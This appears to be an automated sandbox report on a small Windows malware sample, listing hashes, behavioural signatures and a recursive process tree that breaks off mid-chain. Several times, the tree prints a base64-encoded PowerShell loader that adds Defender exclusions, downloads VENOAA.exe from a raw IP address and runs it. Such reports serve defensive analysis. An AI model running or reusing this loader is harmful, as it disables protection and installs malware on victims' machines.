3fcf13982c7b543af58f22f18d77b370f2871eec5f8be3838588189ec528afad

Analysis

max time kernel
118s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240419-en
resource tags

arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
submitted
01/05/2024, 16:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a79bbca37e4d87e9bd35a6d4f4730250.exe
Size

6KB
MD5

a79bbca37e4d87e9bd35a6d4f4730250
SHA1

38e7ddeb8f9e7fe8f56a9a43b012d6d5318f7e48
SHA256

3fcf13982c7b543af58f22f18d77b370f2871eec5f8be3838588189ec528afad
SHA512

fac3c4afeed70e78e3162576716c1055616353e109fcbdc06200239dc4c7d28762ef0ee40dac1d2faa1394903f36209c6f49e12a73533d7b733433401d01ab64
SSDEEP

96:20acCYDSB79X4b60qvjnMDOeI3VIJ5NwC7eAYz0evk+P/Zz44f3szd3ojZrl:2PYDk90qvjsI3mNwCnYPvk+ZPf8zde

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 64 IoCs

flow	pid	Process
7	716	powershell.exe
15	2592	powershell.exe
16	3892	powershell.exe
20	2124	powershell.exe
25	3224	powershell.exe
27	8	powershell.exe
28	3032	powershell.exe
32	4884	powershell.exe
34	2292	powershell.exe
35	5028	powershell.exe
36	4988	powershell.exe
37	3152	powershell.exe
38	3608	powershell.exe
39	4208	powershell.exe
40	1624	powershell.exe
41	2096	powershell.exe
44	3988	powershell.exe
45	3392	powershell.exe
49	3080	powershell.exe
51	1948	powershell.exe
52	2116	powershell.exe
53	972	powershell.exe
54	2672	powershell.exe
56	3964	powershell.exe
57	364	powershell.exe
58	2592	powershell.exe
59	4960	powershell.exe
60	3220	powershell.exe
62	3256	powershell.exe
63	1852	powershell.exe
72	1264	powershell.exe
76	3964	powershell.exe
79	1856	powershell.exe
81	4868	powershell.exe
82	2496	powershell.exe
83	2852	powershell.exe
84	2484	powershell.exe
85	1588	powershell.exe
86	3640	powershell.exe
87	3040	powershell.exe
88	4548	powershell.exe
89	4828	powershell.exe
90	3080	powershell.exe
91	4192	powershell.exe
92	4200	powershell.exe
93	1040	powershell.exe
94	4308	powershell.exe
95	4656	powershell.exe
96	4040	powershell.exe
97	3520	powershell.exe
98	4516	powershell.exe
99	1680	powershell.exe
100	4828	powershell.exe
101	3380	powershell.exe
102	1684	powershell.exe
103	920	powershell.exe
104	4340	powershell.exe
106	1100	powershell.exe
107	3240	powershell.exe
110	4892	powershell.exe
112	4756	powershell.exe
113	3496	powershell.exe
114	1588	powershell.exe
119	2236	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation	VENOAA.exe

Executes dropped EXE 64 IoCs

pid	Process
4544	VENOAA.exe
4340	VENOAA.exe
2800	VENOAA.exe
3200	VENOAA.exe
4648	VENOAA.exe
2288	VENOAA.exe
4444	VENOAA.exe
1788	VENOAA.exe
2848	VENOAA.exe
1608	VENOAA.exe
4516	VENOAA.exe
4932	VENOAA.exe
804	VENOAA.exe
4340	VENOAA.exe
3536	VENOAA.exe
4980	VENOAA.exe
4452	VENOAA.exe
896	VENOAA.exe
3956	VENOAA.exe
4008	VENOAA.exe
2192	VENOAA.exe
1852	VENOAA.exe
4736	VENOAA.exe
3200	VENOAA.exe
4912	VENOAA.exe
2588	VENOAA.exe
4620	VENOAA.exe
5028	VENOAA.exe
3172	VENOAA.exe
3012	VENOAA.exe
2552	VENOAA.exe
4040	VENOAA.exe
116	VENOAA.exe
3496	VENOAA.exe
4020	VENOAA.exe
1684	VENOAA.exe
4356	VENOAA.exe
1040	VENOAA.exe
432	VENOAA.exe
3564	VENOAA.exe
1496	VENOAA.exe
4736	VENOAA.exe
4800	VENOAA.exe
3496	VENOAA.exe
3256	VENOAA.exe
8	VENOAA.exe
3104	VENOAA.exe
4444	VENOAA.exe
3384	VENOAA.exe
2132	VENOAA.exe
3952	VENOAA.exe
4360	VENOAA.exe
3536	VENOAA.exe
2644	VENOAA.exe
1212	VENOAA.exe
3608	VENOAA.exe
4984	VENOAA.exe
3648	VENOAA.exe
4196	VENOAA.exe
2192	VENOAA.exe
3316	VENOAA.exe
1852	VENOAA.exe
3484	VENOAA.exe
1364	VENOAA.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
716	powershell.exe
716	powershell.exe
2592	powershell.exe
2592	powershell.exe
3892	powershell.exe
3892	powershell.exe
2124	powershell.exe
2124	powershell.exe
3224	powershell.exe
3224	powershell.exe
8	powershell.exe
8	powershell.exe
3032	powershell.exe
3032	powershell.exe
4884	powershell.exe
4884	powershell.exe
2292	powershell.exe
2292	powershell.exe
5028	powershell.exe
5028	powershell.exe
4988	powershell.exe
4988	powershell.exe
3152	powershell.exe
3152	powershell.exe
3608	powershell.exe
3608	powershell.exe
4208	powershell.exe
4208	powershell.exe
1624	powershell.exe
1624	powershell.exe
2096	powershell.exe
2096	powershell.exe
3988	powershell.exe
3988	powershell.exe
3392	powershell.exe
3392	powershell.exe
3080	powershell.exe
3080	powershell.exe
1948	powershell.exe
1948	powershell.exe
2116	powershell.exe
2116	powershell.exe
972	powershell.exe
972	powershell.exe
2672	powershell.exe
2672	powershell.exe
3172	powershell.exe
3172	powershell.exe
3964	powershell.exe
3964	powershell.exe
364	powershell.exe
364	powershell.exe
2592	powershell.exe
2592	powershell.exe
4960	powershell.exe
4960	powershell.exe
3220	powershell.exe
3220	powershell.exe
4932	powershell.exe
4932	powershell.exe
3256	powershell.exe
3256	powershell.exe
1852	powershell.exe
1852	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	716	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	3224	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	4988	powershell.exe
Token: SeDebugPrivilege	3152	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeDebugPrivilege	4208	powershell.exe
Token: SeDebugPrivilege	1624	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	3392	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	2116	powershell.exe
Token: SeDebugPrivilege	972	powershell.exe
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	3172	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	364	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	3220	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	1856	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	2496	powershell.exe
Token: SeDebugPrivilege	2852	powershell.exe
Token: SeDebugPrivilege	2484	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeDebugPrivilege	3640	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeDebugPrivilege	4548	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	3080	powershell.exe
Token: SeDebugPrivilege	4192	powershell.exe
Token: SeDebugPrivilege	4200	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeDebugPrivilege	4040	powershell.exe
Token: SeDebugPrivilege	3520	powershell.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	3380	powershell.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeDebugPrivilege	920	powershell.exe
Token: SeDebugPrivilege	4340	powershell.exe
Token: SeDebugPrivilege	4332	powershell.exe
Token: SeDebugPrivilege	1100	powershell.exe
Token: SeDebugPrivilege	3240	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4588 wrote to memory of 716	4588	a79bbca37e4d87e9bd35a6d4f4730250.exe	84
PID 4588 wrote to memory of 716	4588	a79bbca37e4d87e9bd35a6d4f4730250.exe	84
PID 716 wrote to memory of 4544	716	powershell.exe	86
PID 716 wrote to memory of 4544	716	powershell.exe	86
PID 4544 wrote to memory of 2592	4544	VENOAA.exe	88
PID 4544 wrote to memory of 2592	4544	VENOAA.exe	88
PID 2592 wrote to memory of 4340	2592	powershell.exe	93
PID 2592 wrote to memory of 4340	2592	powershell.exe	93
PID 4340 wrote to memory of 3892	4340	VENOAA.exe	94
PID 4340 wrote to memory of 3892	4340	VENOAA.exe	94
PID 3892 wrote to memory of 2800	3892	powershell.exe	98
PID 3892 wrote to memory of 2800	3892	powershell.exe	98
PID 2800 wrote to memory of 2124	2800	VENOAA.exe	99
PID 2800 wrote to memory of 2124	2800	VENOAA.exe	99
PID 2124 wrote to memory of 3200	2124	powershell.exe	101
PID 2124 wrote to memory of 3200	2124	powershell.exe	101
PID 3200 wrote to memory of 3224	3200	VENOAA.exe	102
PID 3200 wrote to memory of 3224	3200	VENOAA.exe	102
PID 3224 wrote to memory of 4648	3224	powershell.exe	106
PID 3224 wrote to memory of 4648	3224	powershell.exe	106
PID 4648 wrote to memory of 8	4648	VENOAA.exe	107
PID 4648 wrote to memory of 8	4648	VENOAA.exe	107
PID 8 wrote to memory of 2288	8	powershell.exe	109
PID 8 wrote to memory of 2288	8	powershell.exe	109
PID 2288 wrote to memory of 3032	2288	VENOAA.exe	111
PID 2288 wrote to memory of 3032	2288	VENOAA.exe	111
PID 3032 wrote to memory of 4444	3032	powershell.exe	113
PID 3032 wrote to memory of 4444	3032	powershell.exe	113
PID 4444 wrote to memory of 4884	4444	VENOAA.exe	114
PID 4444 wrote to memory of 4884	4444	VENOAA.exe	114
PID 4884 wrote to memory of 1788	4884	powershell.exe	117
PID 4884 wrote to memory of 1788	4884	powershell.exe	117
PID 1788 wrote to memory of 2292	1788	VENOAA.exe	118
PID 1788 wrote to memory of 2292	1788	VENOAA.exe	118
PID 2292 wrote to memory of 2848	2292	powershell.exe	121
PID 2292 wrote to memory of 2848	2292	powershell.exe	121
PID 2848 wrote to memory of 5028	2848	VENOAA.exe	122
PID 2848 wrote to memory of 5028	2848	VENOAA.exe	122
PID 5028 wrote to memory of 1608	5028	powershell.exe	124
PID 5028 wrote to memory of 1608	5028	powershell.exe	124
PID 1608 wrote to memory of 4988	1608	VENOAA.exe	125
PID 1608 wrote to memory of 4988	1608	VENOAA.exe	125
PID 4988 wrote to memory of 4516	4988	powershell.exe	127
PID 4988 wrote to memory of 4516	4988	powershell.exe	127
PID 4516 wrote to memory of 3152	4516	VENOAA.exe	128
PID 4516 wrote to memory of 3152	4516	VENOAA.exe	128
PID 3152 wrote to memory of 4932	3152	powershell.exe	130
PID 3152 wrote to memory of 4932	3152	powershell.exe	130
PID 4932 wrote to memory of 3608	4932	VENOAA.exe	132
PID 4932 wrote to memory of 3608	4932	VENOAA.exe	132
PID 3608 wrote to memory of 804	3608	powershell.exe	134
PID 3608 wrote to memory of 804	3608	powershell.exe	134
PID 804 wrote to memory of 4208	804	VENOAA.exe	135
PID 804 wrote to memory of 4208	804	VENOAA.exe	135
PID 4208 wrote to memory of 4340	4208	powershell.exe	137
PID 4208 wrote to memory of 4340	4208	powershell.exe	137
PID 4340 wrote to memory of 1624	4340	VENOAA.exe	138
PID 4340 wrote to memory of 1624	4340	VENOAA.exe	138
PID 1624 wrote to memory of 3536	1624	powershell.exe	140
PID 1624 wrote to memory of 3536	1624	powershell.exe	140
PID 3536 wrote to memory of 2096	3536	VENOAA.exe	141
PID 3536 wrote to memory of 2096	3536	VENOAA.exe	141
PID 2096 wrote to memory of 4980	2096	powershell.exe	144
PID 2096 wrote to memory of 4980	2096	powershell.exe	144

C:\Users\Admin\AppData\Local\Temp\a79bbca37e4d87e9bd35a6d4f4730250.exe
"C:\Users\Admin\AppData\Local\Temp\a79bbca37e4d87e9bd35a6d4f4730250.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:716
- - C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
    "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2592
    - - C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4340
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3892
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
